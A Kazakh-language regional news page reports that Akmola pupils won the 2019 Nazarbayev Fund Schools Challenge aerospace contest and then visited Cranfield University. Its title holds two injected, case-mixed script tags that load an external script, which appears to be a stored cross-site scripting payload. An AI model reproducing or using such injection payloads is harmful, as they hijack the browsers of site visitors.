«Nazarbayev Fund Schools Challenge» аэрокомонавтика тақырыбы бойынша республикалық байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.08.2019

2018-2019 оқу жылдары ҚР-ның тұңғыш президентінің және Әділет министрлігінің ұйымдастыруымен жыл сайын өтетін «Nazarbayev Fund Schools Challenge»  атты аэрокосмонавтика тақырыбы бойынша республикалық байқауы өтті. Байқауда республикамыздың 17 өңірінен топтар қатысты. Байқау 16-18 жас аралығындағы ағылшын тілін еркін меңгерген, жаратылыстану-математикалық бағыттағы жетістіктері бар  қазақстандық оқушылар арасында өткізілді.

Байқаудың қорытынды туры 2019 жылдың 25-27 шілде аралығында Нұр-Сұлтан қаласында өткізілді. Аталмыш байқауға Ақмола облысынан 6 топ қатысты.

Байқаудың қорытындысы бойынша 4 топ жеңіске жетті. Жеңімпаздардың ішінде Ақмола облысының  3 қатысушыларынан тұратын тобы да бар. Атап айтсақ, олар: Степногорск қаласы Л.Н.Толстой атындағы №4 мектеп-гимназиясының  11 сынып оқушылары  Балтабаев Тамерлан, Гетманец Руслан және А.Құнанбаев атындағы №6 мектеп-гимназиясының 10 сынып  оқушысы  Салахетдинова Амина. Жетекшісі Щербина В.А. Алдағы уақытта осы жүлдегерлеріміз 2019 жылдың 19-26 тамыз аралығында оқу сапарымен Сranfield University (Лондон, Ұлыбритания ) аттанады.

Қазіргі уақытта Ақмола облысының тобы Англияда танымдық сапарда. Оқушыларымыз авиациялық ғылымның қыр-сырын меңгеріп, стимуляторлармен жұмыс жасауда.

Топ мүшелерінің әсерлері ең керемет. Оқушыларымыздың  елге аман-есен қайтуына тілектеспіз!

Просмотров: 453


Пікір қосу



Деректерді қолтаңбаға қосу